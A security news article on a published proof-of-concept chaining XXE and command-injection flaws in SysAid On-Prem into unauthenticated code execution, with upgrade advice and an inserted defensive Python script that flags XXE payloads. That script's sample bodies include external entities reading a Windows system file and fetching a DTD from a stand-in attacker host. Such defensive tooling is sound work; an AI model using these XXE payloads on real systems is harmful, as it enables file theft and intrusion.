PoC exploit for SysAid pre-auth RCE released, upgrade quickly!

WatchTowr researchers have released a proof-of-concept (PoC) exploit that chains two vulnerabilities in SysAid On-Prem – the self-hosted version of the platform behind SysAid’s popular IT service management and IT helpdesk solutions – to achieve unauthenticated remote code execution on the underlying server.


The vulnerabilities have been patched in SysAid On-Prem v24.4.60, released in early March 2025, but it’s likely that many enterprises have not upgraded yet.

Creating the PoC

“In an on-premise deployment, SysAid runs as a Windows Server–based application within your organization’s infrastructure. Think of the SysAid server as just another Windows box in your closet, except this one handles every IT ticket, asset record, and help-desk magic you throw at it,” WatchTowr researchers explained.

By probing the application for weaknesses, they uncovered three XML external entity injection vulnerabilities (CVE-2025-2775, CVE-2025-2776 and CVE-2025-2777).

Each of them can be exploited by sending a specially crafted HTTP POST request that forces the application to fetch data from an attacker-controlled server and process it, and none of them requires valid login credentials: the vulnerable endpoints are reachable pre-authentication.
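As an added example (not watchTowr's PoC and not SysAid's code), here is a small Python triage helper for defenders: it flags XML request bodies that carry the building blocks of an XXE attack of the kind described above, and checks a reported SysAid On-Prem version string against the fixed release named in the article. The regexes only recognise the generic DOCTYPE/ENTITY syntax an XXE payload needs; they know nothing about SysAid's real endpoints or request format, which the article does not disclose. The sample bodies and the attacker hostname are constructed for the demo.

```python
"""XXE request triage: added example, not watchTowr's PoC or SysAid's code.

The regexes recognise the generic DOCTYPE/ENTITY syntax an XXE payload needs
(an external entity or external DTD that makes the parser read a local file or
fetch a resource from an attacker-controlled host). They know nothing about
SysAid's real endpoints or request format, which the article does not disclose.
All sample bodies and the attacker hostname below are constructed for the demo.
"""
import re

# Fixed release named in the article; anything older is assumed vulnerable.
FIXED_VERSION = (24, 4, 60)

# <!DOCTYPE root [SYSTEM "uri" | PUBLIC "id" "uri"] [ internal subset ]>
# XML keywords are case-sensitive; matching case-insensitively is deliberately lenient.
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+[^\s\[>]+"
    r"(?:\s+(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s*)"
    r"(?P<q>[\"'])(?P<dtd>[^\"']*)(?P=q))?"
    r"(?:\s*\[(?P<subset>.*?)\])?\s*>",
    re.IGNORECASE | re.DOTALL,
)
# <!ENTITY name SYSTEM "uri">  and parameter entities  <!ENTITY % name SYSTEM "uri">
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?P<q>[\"'])(?P<uri>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)
LOCAL_SCHEMES = ("file:",)
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "ftps:", "jar:", "netdoc:", "gopher:")


def _classify_uri(uri):
    """Local file read vs. fetch from a remote host; a relative URI is still external."""
    u = uri.strip().lower()
    if u.startswith(LOCAL_SCHEMES) or u.startswith("/") or re.match(r"^[a-z]:[\\/]", u):
        return "local-file-read"
    if u.startswith(REMOTE_SCHEMES):
        return "remote-fetch"
    return "external-entity"


def xxe_indicators(body):
    """Return sorted indicator tags for one request body; [] means no DOCTYPE at all."""
    m = DOCTYPE_RE.search(body)
    if not m:
        return []
    tags = set()
    if m.group("dtd"):                # <!DOCTYPE r SYSTEM "http://...">: parser fetches the DTD itself
        tags.add(_classify_uri(m.group("dtd")))
    for ent in ENTITY_RE.finditer(m.group("subset") or ""):
        tags.add(_classify_uri(ent.group("uri")))
        if ent.group("param"):        # %name; entities are the usual blind/out-of-band XXE building block
            tags.add("parameter-entity")
    if not tags:                      # DOCTYPE with only internal entities: still worth a look
        tags.add("doctype-only")
    return sorted(tags)


def needs_upgrade(version):
    """True if a SysAid On-Prem version string is older than the fixed release (or unparseable)."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    return parts < FIXED_VERSION


# Constructed sample bodies (not real SysAid traffic).
BENIGN = '<?xml version="1.0"?><ticket><title>Printer jam</title></ticket>'
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]>'
             '<r>&xxe;</r>')
REMOTE_DTD = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
              '"http://attacker.example/evil.dtd"> %dtd;]><r/>')
EXTERNAL_DTD_REF = '<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>'
INTERNAL_ONLY = '<!DOCTYPE r [<!ENTITY greet "hi">]><r>&greet;</r>'

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("file read", FILE_READ), ("remote DTD", REMOTE_DTD),
               ("external DTD ref", EXTERNAL_DTD_REF), ("internal only", INTERNAL_ONLY)]
    for label, body in samples:
        print(f"{label:17s} -> {xxe_indicators(body)}")
    for v in ("23.3.40", "24.4.50", "24.4.60"):
        print(f"SysAid {v}: {'UPGRADE' if needs_upgrade(v) else 'patched'}")
```

Run it over decoded POST bodies from a reverse proxy or WAF log (multipart and URL-encoded bodies must be decoded first). Any hit other than an empty list on an endpoint that should never accept a DOCTYPE is worth an alert. The check is a triage heuristic, not a control: an attacker can evade a regex with a UTF-16 body or other encoding tricks, so it complements upgrading to v24.4.60 rather than replacing it.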

They then showed that one of these flaws can be leveraged to read a specific file from the instance: a file created when SysAid is first installed, which contains the clear-text password of the main administrator account.

They reported the vulnerabilities to SysAid, and the company patched those and others in the aforementioned v24.4.60 of the platform. Among the others was CVE-2025-2778 (or SYSAID-11246), an OS command injection vulnerability that was either found internally or reported by another researcher.

By diffing the vulnerable and patched versions, they pinpointed the command injection flaw. On its own it requires authentication, but with the administrator credentials obtained via XXE it completes the chain: they demonstrated remote code execution that starts from an unauthenticated HTTP request and needs nothing more than HTTP requests to the server.

Upgrade and/or prevent access to SysAid instances

If your SysAid instance is internet-facing, you should upgrade it as soon as possible, if not immediately: with a PoC publicly available and SysAid On-Prem having been targeted by ransomware gangs in the past, it is only a matter of time before exploitation attempts start.

Also consider whether you really need the instance to be reachable via the internet. If not, disable public internet access, put SysAid behind a firewall or VPN, and only allow access from trusted IPs or internal networks.

Securing SysAid admin and standard user accounts with multi-factor authentication is also a good idea.
